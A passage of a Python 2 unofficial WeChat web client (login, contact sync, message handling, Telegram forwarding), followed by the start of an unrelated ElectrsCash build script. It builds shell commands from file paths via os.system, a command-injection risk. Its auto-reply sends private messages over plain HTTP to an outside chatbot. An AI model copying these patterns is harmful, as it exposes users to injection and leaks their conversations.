os.startfile(QRCODE_PATH)
def waitForLogin(self, tip=1):
time.sleep(tip)
url = 'https://login.weixin.qq.com/cgi-bin/mmwebwx-bin/login?tip=%s&uuid=%s&_=%s' % (
tip, self.uuid, int(time.time()))
data = self._get(url)
pm = re.search(r'window.code=(\d+);', data)
code = pm.group(1)
if code == '201':
return True
elif code == '200':
pm = re.search(r'window.redirect_uri="(\S+?)";', data)
r_uri = pm.group(1) + '&fun=new'
self.redirect_uri = r_uri
self.base_uri = r_uri[:r_uri.rfind('/')]
return True
elif code == '408':
self._echo('[登陆超时] \n')
else:
self._echo('[登陆异常] \n')
return False
def login(self):
data = self._get(self.redirect_uri)
doc = xml.dom.minidom.parseString(data)
root = doc.documentElement
for node in root.childNodes:
if node.nodeName == 'skey':
self.skey = node.childNodes[0].data
elif node.nodeName == 'wxsid':
self.sid = node.childNodes[0].data
elif node.nodeName == 'wxuin':
self.uin = node.childNodes[0].data
elif node.nodeName == 'pass_ticket':
self.pass_ticket = node.childNodes[0].data
if '' in (self.skey, self.sid, self.uin, self.pass_ticket):
return False
self.BaseRequest = {
'Uin': int(self.uin),
'Sid': self.sid,
'Skey': self.skey,
'DeviceID': self.deviceId,
}
return True
def webwxinit(self):
url = self.base_uri + '/webwxinit?pass_ticket=%s&skey=%s&r=%s' % (
self.pass_ticket, self.skey, int(time.time()))
params = {
'BaseRequest': self.BaseRequest
}
dic = self._post(url, params)
self.SyncKey = dic['SyncKey']
self.User = dic['User']
# synckey for synccheck
self.synckey = '|'.join(
[str(keyVal['Key']) + '_' + str(keyVal['Val']) for keyVal in self.SyncKey['List']])
return dic['BaseResponse']['Ret'] == 0
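        # The synckey built above is a string like "1_661706053|2_661706420|1000_1491849443"
        # (values illustrative): Key_Val pairs joined by '|', echoed back on every synccheck poll.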
def webwxstatusnotify(self):
url = self.base_uri + \
'/webwxstatusnotify?lang=zh_CN&pass_ticket=%s' % (self.pass_ticket)
params = {
'BaseRequest': self.BaseRequest,
"Code": 3,
"FromUserName": self.User['UserName'],
"ToUserName": self.User['UserName'],
"ClientMsgId": int(time.time())
}
dic = self._post(url, params)
return dic['BaseResponse']['Ret'] == 0
def webwxgetcontact(self):
SpecialUsers = self.SpecialUsers
print self.base_uri
url = self.base_uri + '/webwxgetcontact?pass_ticket=%s&skey=%s&r=%s' % (
self.pass_ticket, self.skey, int(time.time()))
dic = self._post(url, {})
self.MemberCount = dic['MemberCount']
self.MemberList = dic['MemberList']
ContactList = self.MemberList[:]
GroupList = self.GroupList[:]
PublicUsersList = self.PublicUsersList[:]
SpecialUsersList = self.SpecialUsersList[:]
for i in xrange(len(ContactList) - 1, -1, -1):
Contact = ContactList[i]
            if Contact['VerifyFlag'] & 8 != 0:  # official / service account
ContactList.remove(Contact)
self.PublicUsersList.append(Contact)
            elif Contact['UserName'] in SpecialUsers:  # special built-in account
ContactList.remove(Contact)
self.SpecialUsersList.append(Contact)
            elif Contact['UserName'].find('@@') != -1:  # group chat
ContactList.remove(Contact)
self.GroupList.append(Contact)
            elif Contact['UserName'] == self.User['UserName']:  # self (own account)
ContactList.remove(Contact)
self.ContactList = ContactList
return True
def webwxbatchgetcontact(self):
url = self.base_uri + \
'/webwxbatchgetcontact?type=ex&r=%s&pass_ticket=%s' % (
int(time.time()), self.pass_ticket)
params = {
'BaseRequest': self.BaseRequest,
"Count": len(self.GroupList),
"List": [{"UserName": g['UserName'], "EncryChatRoomId":""} for g in self.GroupList]
}
dic = self._post(url, params)
# blabla ...
ContactList = dic['ContactList']
ContactCount = dic['Count']
self.GroupList = ContactList
for i in xrange(len(ContactList) - 1, -1, -1):
Contact = ContactList[i]
MemberList = Contact['MemberList']
for member in MemberList:
self.GroupMemeberList.append(member)
return True
def getNameById(self, id):
url = self.base_uri + \
'/webwxbatchgetcontact?type=ex&r=%s&pass_ticket=%s' % (
int(time.time()), self.pass_ticket)
params = {
'BaseRequest': self.BaseRequest,
"Count": 1,
"List": [{"UserName": id, "EncryChatRoomId": ""}]
}
dic = self._post(url, params)
# blabla ...
return dic['ContactList']
def testsynccheck(self):
SyncHost = [
'webpush.weixin.qq.com',
'webpush2.weixin.qq.com',
'webpush.wechat.com',
'webpush1.wechat.com',
'webpush2.wechat.com',
'webpush1.wechatapp.com',
# 'webpush.wechatapp.com'
]
for host in SyncHost:
self.syncHost = host
[retcode, selector] = self.synccheck()
if retcode == '0':
return True
return False
def synccheck(self):
params = {
'r': int(time.time()),
'sid': self.sid,
'uin': self.uin,
'skey': self.skey,
'deviceid': self.deviceId,
'synckey': self.synckey,
'_': int(time.time()),
}
url = 'https://' + self.syncHost + \
'/cgi-bin/mmwebwx-bin/synccheck?' + urllib.urlencode(params)
data = self._get(url)
pm = re.search(
r'window.synccheck={retcode:"(\d+)",selector:"(\d+)"}', data)
retcode = pm.group(1)
selector = pm.group(2)
return [retcode, selector]
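        # retcode/selector are interpreted by listenMsgMode() below: retcode '1100'/'1101' mean
        # the session ended (logged out on the phone / web login elsewhere); with retcode '0',
        # selector '2' means new messages, '7' means activity on the phone, '0' means nothing new.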
def webwxsync(self):
url = self.base_uri + \
'/webwxsync?sid=%s&skey=%s&pass_ticket=%s' % (
self.sid, self.skey, self.pass_ticket)
params = {
'BaseRequest': self.BaseRequest,
'SyncKey': self.SyncKey,
'rr': ~int(time.time())
}
dic = self._post(url, params)
if self.DEBUG:
print json.dumps(dic, indent=4)
logging.debug(json.dumps(dic, indent=4))
if dic['BaseResponse']['Ret'] == 0:
self.SyncKey = dic['SyncKey']
self.synckey = '|'.join(
[str(keyVal['Key']) + '_' + str(keyVal['Val']) for keyVal in self.SyncKey['List']])
return dic
def webwxsendmsg(self, word, to='filehelper'):
url = self.base_uri + \
'/webwxsendmsg?pass_ticket=%s' % (self.pass_ticket)
clientMsgId = str(int(time.time() * 1000)) + \
str(random.random())[:5].replace('.', '')
params = {
'BaseRequest': self.BaseRequest,
'Msg': {
"Type": 1,
"Content": self._transcoding(word),
"FromUserName": self.User['UserName'],
"ToUserName": to,
"LocalID": clientMsgId,
"ClientMsgId": clientMsgId
}
}
headers = {'content-type': 'application/json; charset=UTF-8'}
data = json.dumps(params, ensure_ascii=False).encode('utf8')
r = requests.post(url, data=data, headers=headers)
dic = r.json()
return dic['BaseResponse']['Ret'] == 0
def webwxuploadmedia(self, image_name):
url = 'https://file2.wx.qq.com/cgi-bin/mmwebwx-bin/webwxuploadmedia?f=json'
        # media upload counter
self.media_count = self.media_count + 1
        # file name
file_name = image_name
        # MIME type
# mime_type = application/pdf, image/jpeg, image/png, etc.
mime_type = mimetypes.guess_type(image_name, strict=False)[0]
        # Document types recognized by WeChat: the server appears to support only two, 'pic' and 'doc'.
        # 'pic' is shown inline as an image; 'doc' is shown as a file attachment.
media_type = 'pic' if mime_type.split('/')[0] == 'image' else 'doc'
        # last-modified date
lastModifieDate = 'Thu Mar 17 2016 00:55:10 GMT+0800 (CST)'
        # file size
file_size = os.path.getsize(file_name)
# PassTicket
pass_ticket = self.pass_ticket
# clientMediaId
client_media_id = str(int(time.time() * 1000)) + \
str(random.random())[:5].replace('.', '')
# webwx_data_ticket
webwx_data_ticket = ''
for item in self.cookie:
if item.name == 'webwx_data_ticket':
webwx_data_ticket = item.value
break
if (webwx_data_ticket == ''):
return "None Fuck Cookie"
uploadmediarequest = json.dumps({
"BaseRequest": self.BaseRequest,
"ClientMediaId": client_media_id,
"TotalLen": file_size,
"StartPos": 0,
"DataLen": file_size,
"MediaType": 4
}, ensure_ascii=False).encode('utf8')
multipart_encoder = MultipartEncoder(
fields={
'id': 'WU_FILE_' + str(self.media_count),
'name': file_name,
'type': mime_type,
'lastModifieDate': lastModifieDate,
'size': str(file_size),
'mediatype': media_type,
'uploadmediarequest': uploadmediarequest,
'webwx_data_ticket': webwx_data_ticket,
'pass_ticket': pass_ticket,
'filename': (file_name, open(file_name, 'rb'), mime_type.split('/')[1])
},
boundary='-----------------------------1575017231431605357584454111'
)
headers = {
'Host': 'file2.wx.qq.com',
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:42.0) Gecko/20100101 Firefox/42.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate',
'Referer': 'https://wx2.qq.com/',
'Content-Type': multipart_encoder.content_type,
'Origin': 'https://wx2.qq.com',
'Connection': 'keep-alive',
'Pragma': 'no-cache',
'Cache-Control': 'no-cache'
}
r = requests.post(url, data=multipart_encoder, headers=headers)
response_json = r.json()
if response_json['BaseResponse']['Ret'] == 0:
return response_json
return None
def webwxsendmsgimg(self, user_id, media_id):
url = 'https://wx2.qq.com/cgi-bin/mmwebwx-bin/webwxsendmsgimg?fun=async&f=json&pass_ticket=%s' % self.pass_ticket
clientMsgId = str(int(time.time() * 1000)) + \
str(random.random())[:5].replace('.', '')
data_json = {
"BaseRequest": self.BaseRequest,
"Msg": {
"Type": 3,
"MediaId": media_id,
"FromUserName": self.User['UserName'],
"ToUserName": user_id,
"LocalID": clientMsgId,
"ClientMsgId": clientMsgId
}
}
headers = {'content-type': 'application/json; charset=UTF-8'}
data = json.dumps(data_json, ensure_ascii=False).encode('utf8')
r = requests.post(url, data=data, headers=headers)
dic = r.json()
return dic['BaseResponse']['Ret'] == 0
def _saveFile(self, filename, data, api=None):
fn = filename
if self.saveSubFolders[api]:
dirName = os.path.join(self.saveFolder, self.saveSubFolders[api])
if not os.path.exists(dirName):
os.makedirs(dirName)
fn = os.path.join(dirName, filename)
logging.debug('Saved file: %s' % fn)
with open(fn, 'wb') as f:
f.write(data)
f.close()
return fn
def webwxgeticon(self, id):
url = self.base_uri + \
'/webwxgeticon?username=%s&skey=%s' % (id, self.skey)
data = self._get(url)
fn = 'img_' + id + '.jpg'
return self._saveFile(fn, data, 'webwxgeticon')
def webwxgetheadimg(self, id):
url = self.base_uri + \
'/webwxgetheadimg?username=%s&skey=%s' % (id, self.skey)
data = self._get(url)
fn = 'img_' + id + '.jpg'
return self._saveFile(fn, data, 'webwxgetheadimg')
def webwxgetmsgimg(self, msgid):
url = self.base_uri + \
'/webwxgetmsgimg?MsgID=%s&skey=%s' % (msgid, self.skey)
data = self._get(url)
fn = 'img_' + msgid + '.jpg'
return self._saveFile(fn, data, 'webwxgetmsgimg')
    # Currently not working, since web WeChat does not support this API
def webwxgetvideo(self, msgid):
url = self.base_uri + \
'/webwxgetvideo?msgid=%s&skey=%s' % (msgid, self.skey)
data = self._get(url, api='webwxgetvideo')
fn = 'video_' + msgid + '.mp4'
return self._saveFile(fn, data, 'webwxgetvideo')
def webwxgetvoice(self, msgid):
url = self.base_uri + \
'/webwxgetvoice?msgid=%s&skey=%s' % (msgid, self.skey)
data = self._get(url)
fn = 'voice_' + msgid + '.mp3'
return self._saveFile(fn, data, 'webwxgetvoice')
def getGroupName(self, id):
name = '未知群'
for member in self.GroupList:
if member['UserName'] == id:
name = member['NickName']
if name == '未知群':
            # not found among the groups we already know about
GroupList = self.getNameById(id)
for group in GroupList:
self.GroupList.append(group)
if group['UserName'] == id:
name = group['NickName']
MemberList = group['MemberList']
for member in MemberList:
self.GroupMemeberList.append(member)
return name
def getUserRemarkName(self, id):
name = '未知群' if id[:2] == '@@' else '陌生人'
if id == self.User['UserName']:
return self.User['NickName'] # 自己
if id[:2] == '@@':
            # group chat
name = self.getGroupName(id)
else:
            # special built-in accounts
for member in self.SpecialUsersList:
if member['UserName'] == id:
name = member['RemarkName'] if member[
'RemarkName'] else member['NickName']
            # official or service accounts
for member in self.PublicUsersList:
if member['UserName'] == id:
name = member['RemarkName'] if member[
'RemarkName'] else member['NickName']
            # direct contacts
for member in self.ContactList:
if member['UserName'] == id:
name = member['RemarkName'] if member[
'RemarkName'] else member['NickName']
            # group members
for member in self.GroupMemeberList:
if member['UserName'] == id:
name = member['DisplayName'] if member[
'DisplayName'] else member['NickName']
if name == '未知群' or name == '陌生人':
logging.debug(id)
return name
def getUSerID(self, name):
for member in self.MemberList:
if name == member['RemarkName'] or name == member['NickName']:
return member['UserName']
return None
def formatMsg(self, message):
srcName = None
dstName = None
groupName = None
content = None
msg = message
if msg['raw_msg']:
srcName = self.getUserRemarkName(msg['raw_msg']['FromUserName'])
dstName = self.getUserRemarkName(msg['raw_msg']['ToUserName'])
content = msg['raw_msg']['Content'].replace(
'<', '<').replace('>', '>')
message_id = msg['raw_msg']['MsgId']
if content.find('http://weixin.qq.com/cgi-bin/redirectforward?args=') != -1:
# 地理位置消息
data = self._get(content).decode('gbk').encode('utf-8')
pos = self._searchContent('title', data, 'xml')
tree = html.fromstring(self._get(content))
url = tree.xpath('//html/body/div/img')[0].attrib['src']
for item in urlparse(url).query.split('&'):
if item.split('=')[0] == 'center':
loc = item.split('=')[-1:]
content = '%s 发送了一个 位置消息 - 我在 [%s](%s) @ %s]' % (
srcName, pos, url, loc)
if msg['raw_msg']['ToUserName'] == 'filehelper':
# 文件传输助手
dstName = '文件传输助手'
if msg['raw_msg']['FromUserName'][:2] == '@@':
# 接收到来自群的消息
if re.search(":<br/>", content, re.IGNORECASE):
[people, content] = content.split(':<br/>')
groupName = srcName
srcName = self.getUserRemarkName(people)
dstName = 'GROUP'
else:
groupName = srcName
srcName = 'SYSTEM'
elif msg['raw_msg']['ToUserName'][:2] == '@@':
# 自己发给群的消息
groupName = dstName
dstName = 'GROUP'
# 收到了红包
if content == '收到红包,请在手机上查看':
msg['message'] = content
# 指定了消息内容
if 'message' in msg.keys():
content = msg['message']
if groupName != None:
msg = {
'type': 'group',
'group': groupName.strip(),
'from': srcName.strip(),
'to': dstName.strip() if dstName != 'GROUP' else '',
'body': content.replace('<br/>', '\n'),
'time': msg['raw_msg']['CreateTime'],
}
else:
msg = {
'from': srcName.strip(),
'to': dstName.strip(),
'body': content.replace('<br/>', '\n'),
'time': msg['raw_msg']['CreateTime'],
}
return _unicode_dict(msg)
def _showMsg(self, message):
srcName = None
dstName = None
groupName = None
content = None
msg = message
logging.debug(msg)
if msg['raw_msg']:
srcName = self.getUserRemarkName(msg['raw_msg']['FromUserName'])
dstName = self.getUserRemarkName(msg['raw_msg']['ToUserName'])
content = msg['raw_msg']['Content'].replace(
'<', '<').replace('>', '>')
message_id = msg['raw_msg']['MsgId']
if content.find('http://weixin.qq.com/cgi-bin/redirectforward?args=') != -1:
# 地理位置消息
data = self._get(content).decode('gbk').encode('utf-8')
pos = self._searchContent('title', data, 'xml')
tree = html.fromstring(self._get(content))
url = tree.xpath('//html/body/div/img')[0].attrib['src']
for item in urlparse(url).query.split('&'):
if item.split('=')[0] == 'center':
loc = item.split('=')[-1:]
content = '%s 发送了一个 位置消息 - 我在 [%s](%s) @ %s]' % (
srcName, pos, url, loc)
if msg['raw_msg']['ToUserName'] == 'filehelper':
# 文件传输助手
dstName = '文件传输助手'
if msg['raw_msg']['FromUserName'][:2] == '@@':
# 接收到来自群的消息
if re.search(":<br/>", content, re.IGNORECASE):
[people, content] = content.split(':<br/>')
groupName = srcName
srcName = self.getUserRemarkName(people)
dstName = 'GROUP'
else:
groupName = srcName
srcName = 'SYSTEM'
elif msg['raw_msg']['ToUserName'][:2] == '@@':
# 自己发给群的消息
groupName = dstName
dstName = 'GROUP'
# 收到了红包
if content == '收到红包,请在手机上查看':
msg['message'] = content
# 指定了消息内容
if 'message' in msg.keys():
content = msg['message']
if groupName != None:
msg = {
'type': 'group',
'group': groupName.strip(),
'from': srcName.strip(),
'to': dstName.strip(),
'body': content.replace('<br/>', '\n'),
'time': None,
}
print '%s |%s| %s -> %s: %s' % (message_id, groupName.strip(), srcName.strip(), dstName.strip(), content.replace('<br/>', '\n'))
logging.info('%s |%s| %s -> %s: %s' % (message_id, groupName.strip(),
srcName.strip(), dstName.strip(), content.replace('<br/>', '\n')))
else:
msg = {
'from': srcName.strip(),
'to': dstName.strip(),
'body': content.replace('<br/>', '\n'),
'time': None,
}
print '%s %s -> %s: %s' % (message_id, srcName.strip(), dstName.strip(), content.replace('<br/>', '\n'))
logging.info('%s %s -> %s: %s' % (message_id, srcName.strip(),
dstName.strip(), content.replace('<br/>', '\n')))
def handleMsg(self, r):
for msg in r['AddMsgList']:
print '[*] 你有新的消息,请注意查收'
logging.debug('[*] 你有新的消息,请注意查收')
if self.DEBUG:
fn = 'msg' + str(int(random.random() * 1000)) + '.json'
with open(fn, 'w') as f:
f.write(json.dumps(msg))
print '[*] 该消息已储存到文件: ' + fn
logging.debug('[*] 该消息已储存到文件: %s' % (fn))
msgType = msg['MsgType']
name = self.getUserRemarkName(msg['FromUserName'])
content = msg['Content'].replace('<', '<').replace('>', '>')
msgid = msg['MsgId']
if msgType == 1:
raw_msg = {'raw_msg': msg}
self._showMsg(raw_msg)
if self.autoReplyMode:
ans = self._xiaodoubi(content) + '\n[微信机器人自动回复]'
if self.webwxsendmsg(ans, msg['FromUserName']):
print '自动回复: ' + ans
logging.info('自动回复: ' + ans)
else:
print '自动回复失败'
logging.info('自动回复失败')
elif msgType == 3:
image = self.webwxgetmsgimg(msgid)
raw_msg = {'raw_msg': msg,
'message': '%s 发送了一张图片: %s' % (name, image)}
self._showMsg(raw_msg)
# self._safe_open(image)
elif msgType == 34:
voice = self.webwxgetvoice(msgid)
raw_msg = {'raw_msg': msg,
'message': '%s 发了一段语音: %s' % (name, voice)}
self._showMsg(raw_msg)
# self._safe_open(voice)
elif msgType == 42:
info = msg['RecommendInfo']
print '%s 发送了一张名片:' % name
print '========================='
print '= 昵称: %s' % info['NickName']
print '= 微信号: %s' % info['Alias']
print '= 地区: %s %s' % (info['Province'], info['City'])
print '= 性别: %s' % ['未知', '男', '女'][info['Sex']]
print '========================='
raw_msg = {
'raw_msg': msg,
'message': '名片: \n*昵称*: {}\n*微信号*: {}\n*地区*: {} {}\n*性别*: {}'.format(
info['NickName'],
info['Alias'],
info['Province'], info['City'],
['未知', '男', '女', ][info['Sex']]
),
}
self._showMsg(raw_msg)
elif msgType == 47:
url = self._searchContent('cdnurl', content)
raw_msg = {
'raw_msg': msg,
'message': '[动画表情]({})'.format(url),
}
self._showMsg(raw_msg)
# self._safe_open(url)
elif msgType == 49:
appMsgType = defaultdict(lambda: "")
appMsgType.update({5: '链接', 3: '音乐', 7: '微博'})
print '%s 分享了一个%s:' % (name, appMsgType[msg['AppMsgType']])
print '========================='
print '= 标题: %s' % msg['FileName']
print '= 描述: %s' % self._searchContent('des', content, 'xml')
print '= 链接: %s' % msg['Url']
print '= 来自: %s' % self._searchContent('appname', content, 'xml')
print '========================='
card = {
'title': msg['FileName'],
'description': self._searchContent('des', content, 'xml'),
'url': msg['Url'],
'appname': self._searchContent('appname', content, 'xml')
}
raw_msg = {
'raw_msg': msg,
'message': '{}: [{}]({}) '.format(
appMsgType[msg['AppMsgType']],
msg['FileName'],
msg['Url']
),
}
self._showMsg(raw_msg)
elif msgType == 51:
raw_msg = {'raw_msg': msg, 'message': '[*] 成功获取联系人信息'}
self._showMsg(raw_msg)
elif msgType == 62:
video = self.webwxgetvideo(msgid)
raw_msg = {'raw_msg': msg,
'message': '%s 发了一段小视频: %s' % (name, video)}
self._showMsg(raw_msg)
# self._safe_open(video)
elif msgType == 10002:
raw_msg = {'raw_msg': msg, 'message': '%s 撤回了一条消息' % name}
self._showMsg(raw_msg)
else:
logging.debug('[*] 该消息类型为: %d,可能是表情,图片, 链接或红包: %s' %
(msg['MsgType'], json.dumps(msg)))
raw_msg = {
'raw_msg': msg, 'message': '[*] 该消息类型为: %d,可能是表情,图片, 链接或红包' % msg['MsgType']}
self._showMsg(raw_msg)
if msgType in FORWARD_TYPES:
self.forwardToTelegram(self.formatMsg(raw_msg))
def forwardToTelegram(self, msg):
'''Forward a msg to Telegram'''
if getattr(self, 'telegram_adapter', None) is None:
# No adapter has been set, can't do anything
return
self.telegram_adapter.send(msg)
def listenMsgMode(self):
print '[*] 进入消息监听模式 ... 成功'
logging.debug('[*] 进入消息监听模式 ... 成功')
self._run('[*] 进行同步线路测试 ... ', self.testsynccheck)
playWeChat = 0
redEnvelope = 0
while True:
self.lastCheckTs = time.time()
[retcode, selector] = self.synccheck()
if self.DEBUG:
print 'retcode: %s, selector: %s' % (retcode, selector)
logging.debug('retcode: %s, selector: %s' % (retcode, selector))
if retcode == '1100':
print '[*] 你在手机上登出了微信,债见'
logging.debug('[*] 你在手机上登出了微信,债见')
self.forwardToTelegram(_unicode_dict({
'body': '消息转发已经停止,你可能在手机上登出了微信',
'time': time.time(),
'from': 'WeChatForwardBot',
}))
break
if retcode == '1101':
print '[*] 你在其他地方登录了 WEB 版微信,债见'
logging.debug('[*] 你在其他地方登录了 WEB 版微信,债见')
self.forwardToTelegram(_unicode_dict({
'body': '消息转发已经停止,你可能在其他地方登录了 WEB 版微信',
'time': time.time(),
'from': 'WeChatForwardBot',
}))
break
elif retcode == '0':
if selector == '2':
r = self.webwxsync()
if r is not None:
self.handleMsg(r)
elif selector == '6':
# TODO
redEnvelope += 1
print '[*] 收到疑似红包消息 %d 次' % redEnvelope
logging.debug('[*] 收到疑似红包消息 %d 次' % redEnvelope)
elif selector == '7':
playWeChat += 1
print '[*] 你在手机上玩微信被我发现了 %d 次' % playWeChat
logging.debug('[*] 你在手机上玩微信被我发现了 %d 次' % playWeChat)
r = self.webwxsync()
elif selector == '0':
time.sleep(1)
            if (time.time() - self.lastCheckTs) <= self.TimeOut:
                # sleep off the remainder of the minimum poll interval before the next synccheck
                time.sleep(self.TimeOut - (time.time() - self.lastCheckTs))
def sendMsg(self, name, word, isfile=False):
id = self.getUSerID(name)
if id:
if isfile:
with open(word, 'r') as f:
for line in f.readlines():
line = line.replace('\n', '')
self._echo('-> ' + name + ': ' + line)
if self.webwxsendmsg(line, id):
print ' [成功]'
else:
print ' [失败]'
time.sleep(1)
else:
if self.webwxsendmsg(word, id):
print '[*] 消息发送成功'
logging.debug('[*] 消息发送成功')
else:
print '[*] 消息发送失败'
logging.debug('[*] 消息发送失败')
else:
print '[*] 此用户不存在'
logging.debug('[*] 此用户不存在')
def sendMsgToAll(self, word):
for contact in self.ContactList:
name = contact['RemarkName'] if contact[
'RemarkName'] else contact['NickName']
id = contact['UserName']
self._echo('-> ' + name + ': ' + word)
if self.webwxsendmsg(word, id):
print ' [成功]'
else:
print ' [失败]'
time.sleep(1)
def sendImg(self, name, file_name):
response = self.webwxuploadmedia(file_name)
media_id = ""
if response is not None:
media_id = response['MediaId']
user_id = self.getUSerID(name)
response = self.webwxsendmsgimg(user_id, media_id)
@catchKeyboardInterrupt
def start(self):
self._echo('[*] 微信网页版 ... 开动')
print
logging.debug('[*] 微信网页版 ... 开动')
while True:
self._run('[*] 正在获取 uuid ... ', self.getUUID)
self._echo('[*] 正在获取二维码 ... 成功')
print
logging.debug('[*] 微信网页版 ... 开动')
self.genQRCode()
print '[*] 请使用微信扫描二维码以登录 ... '
if not self.waitForLogin():
continue
print '[*] 请在手机上点击确认以登录 ... '
if not self.waitForLogin(0):
continue
break
self._run('[*] 正在登录 ... ', self.login)
self._run('[*] 微信初始化 ... ', self.webwxinit)
self._run('[*] 开启状态通知 ... ', self.webwxstatusnotify)
self._run('[*] 获取联系人 ... ', self.webwxgetcontact)
self._echo('[*] 应有 %s 个联系人,读取到联系人 %d 个' %
(self.MemberCount, len(self.MemberList)))
print
self._echo('[*] 共有 %d 个群 | %d 个直接联系人 | %d 个特殊账号 | %d 公众号或服务号' % (len(self.GroupList),
len(self.ContactList), len(self.SpecialUsersList), len(self.PublicUsersList)))
print
self._run('[*] 获取群 ... ', self.webwxbatchgetcontact)
logging.debug('[*] 微信网页版 ... 开动')
if self.DEBUG:
print self
logging.debug(self)
if self.interactive and raw_input('[*] 是否开启自动回复模式(y/n): ') == 'y':
self.autoReplyMode = True
print '[*] 自动回复模式 ... 开启'
logging.debug('[*] 自动回复模式 ... 开启')
else:
print '[*] 自动回复模式 ... 关闭'
logging.debug('[*] 自动回复模式 ... 关闭')
listenProcess = multiprocessing.Process(target=self.listenMsgMode)
listenProcess.start()
while True:
text = raw_input('')
if text == 'quit':
listenProcess.terminate()
print('[*] 退出微信')
logging.debug('[*] 退出微信')
exit()
elif text[:2] == '->':
[name, word] = text[2:].split(':')
if name == 'all':
self.sendMsgToAll(word)
else:
self.sendMsg(name, word)
elif text[:3] == 'm->':
[name, file] = text[3:].split(':')
self.sendMsg(name, file, True)
elif text[:3] == 'f->':
print '发送文件'
logging.debug('发送文件')
elif text[:3] == 'i->':
print '发送图片'
[name, file_name] = text[3:].split(':')
self.sendImg(name, file_name)
logging.debug('发送图片')
def _safe_open(self, path):
if self.autoOpen:
if platform.system() == "Linux":
os.system("xdg-open %s &" % path)
else:
os.system('open %s &' % path)
def _run(self, str, func, *args):
self._echo(str)
if func(*args):
print '成功'
logging.debug('%s... 成功' % (str))
else:
print('失败\n[*] 退出程序')
logging.debug('%s... 失败' % (str))
logging.debug('[*] 退出程序')
exit()
def _echo(self, str):
sys.stdout.write(str)
sys.stdout.flush()
def _printQR(self, mat):
for i in mat:
BLACK = '\033[40m \033[0m'
WHITE = '\033[47m \033[0m'
print ''.join([BLACK if j else WHITE for j in i])
def _str2qr(self, str):
qr = qrcode.QRCode()
qr.border = 1
qr.add_data(str)
mat = qr.get_matrix()
self._printQR(mat) # qr.print_tty() or qr.print_ascii()
def _transcoding(self, data):
if not data:
return data
result = None
if type(data) == unicode:
result = data
elif type(data) == str:
result = data.decode('utf-8')
return result
def _get(self, url, api=None):
request = urllib2.Request(url=url)
request.add_header('Referer', 'https://wx.qq.com/')
if api == 'webwxgetvoice':
request.add_header('Range', 'bytes=0-')
if api == 'webwxgetvideo':
request.add_header('Range', 'bytes=0-')
e = None
try:
logging.debug(url)
response = urllib2.urlopen(request)
data = response.read()
except Exception as e:
logging.error(e, exc_info=True)
while e is not None:
try:
logging.debug(url)
response = urllib2.urlopen(request)
data = response.read()
break
except Exception as e:
logging.error(e, exc_info=True)
return data
def _post(self, url, params, jsonfmt=True):
if jsonfmt:
request = urllib2.Request(url=url, data=json.dumps(params))
request.add_header(
'ContentType', 'application/json; charset=UTF-8')
else:
request = urllib2.Request(url=url, data=urllib.urlencode(params))
e = None
try:
response = urllib2.urlopen(request)
data = response.read()
except Exception as e:
while e is not None:
try:
response = urllib2.urlopen(request)
data = response.read()
break
except Exception as e:
logging.error(e, exc_info=True)
if jsonfmt:
return json.loads(data, object_hook=_decode_dict)
return data
def _xiaodoubi(self, word):
url = 'http://www.xiaodoubi.com/bot/chat.php'
try:
r = requests.post(url, data={'chat': word})
return r.content
except:
return "让我一个人静静 T_T..."
def _simsimi(self, word):
key = ''
url = 'http://sandbox.api.simsimi.com/request.p?key=%s&lc=ch&ft=0.0&text=%s' % (
key, word)
r = requests.get(url)
ans = r.json()
if ans['result'] == '100':
return ans['response']
else:
return '你在说什么,风太大听不清列'
def _searchContent(self, key, content, fmat='attr'):
if fmat == 'attr':
pm = re.search(key + '\s?=\s?"([^"<]+)"', content)
if pm:
return pm.group(1)
elif fmat == 'xml':
pm = re.search('<{0}>([^<]+)</{0}>'.format(key), content)
if not pm:
pm = re.search(
'<{0}><\!\[CDATA\[(.*?)\]\]></{0}>'.format(key), content)
if pm:
return pm.group(1)
return '未知'
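# Note: _searchContent() pulls a single field out of the XML fragments that
# WeChat messages carry, either from an attribute (fmat='attr', e.g.
# title="hello" yields 'hello') or from an element/CDATA body (fmat='xml',
# e.g. <title>hello</title> yields 'hello'); it falls back to '未知' ("unknown")
# when nothing matches. The sample values here are illustrative only.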
class UnicodeStreamFilter:
def __init__(self, target):
self.target = target
self.encoding = 'utf-8'
self.errors = 'replace'
self.encode_to = self.target.encoding
def write(self, s):
if type(s) == str:
s = s.decode('utf-8')
s = s.encode(self.encode_to, self.errors).decode(self.encode_to)
self.target.write(s)
def flush(self):
self.target.flush()
if sys.stdout.encoding == 'cp936':
sys.stdout = UnicodeStreamFilter(sys.stdout)
if __name__ == '__main__':
logger = logging.getLogger(__name__)
import coloredlogs
coloredlogs.install(level='DEBUG')
webwx = WebWeixin()
webwx.start()
|
build_electrs.py
|
#!/usr/bin/env python3
import argparse
import logging
import os
import sys
import shutil
PROJECT_NAME = "ElectrsCash"
GIT_REPO = "https://github.com/BitcoinUnlimited/{}.git".format(PROJECT_NAME)
GIT_BRANCH = "v1.0.0"
EXPECT_HEAD = "aa95d64d050c286356dadb78d19c2e687dec85cf"
ROOT_DIR = os.path.realpath(
os.path.join(os.path.dirname(__file__), os.pardir, os.pardir))
ELECTRS_DIR = os.path.join(ROOT_DIR, PROJECT_NAME)
ELECTRS_BIN = "electrscash"
parser = argparse.ArgumentParser()
parser.add_argument('--allow-modified', help='Allow building modified/dirty repo',
action = "store_true")
parser.add_argument('--verbose', help='Sets log level to DEBUG',
action = "store_true")
parser.add_argument('--dst', help='Where to copy produced binary',
default=os.path.join(ROOT_DIR, "src"))
parser.add_argument('--target', help='Target platform (e.g. x86_64-pc-linux-gnu)',
default="x86_64-unknown-linux-gnu")
parser.add_argument('--debug', help="Do a debug build", action = "store_true")
args = parser.parse_args()
level = logging.DEBUG if args.verbose else logging.INFO
logging.basicConfig(format = '%(asctime)s.%(levelname)s: %(message)s',
level=level,
stream=sys.stdout)
def bail(*args):
logging.error(*args)
sys.exit(1)
def check_dependencies():
v = sys.version_info
if v[0] < 3 or (v[0] == 3 and v[1] < 3):
bail("python >= 3.3 required");
try:
import git
except Exception as e:
logging.error("Failed to 'import git'")
logging.error("Tip: On Debian/Ubuntu you need to install python3-git")
bail(str(e))
import shutil
if shutil.which("cargo") is None:
logging.error("Cannot find 'cargo', will not be able to build {}".format(PROJECT_NAME))
logging.error("You need to install rust (1.34+) https://rustup.rs/")
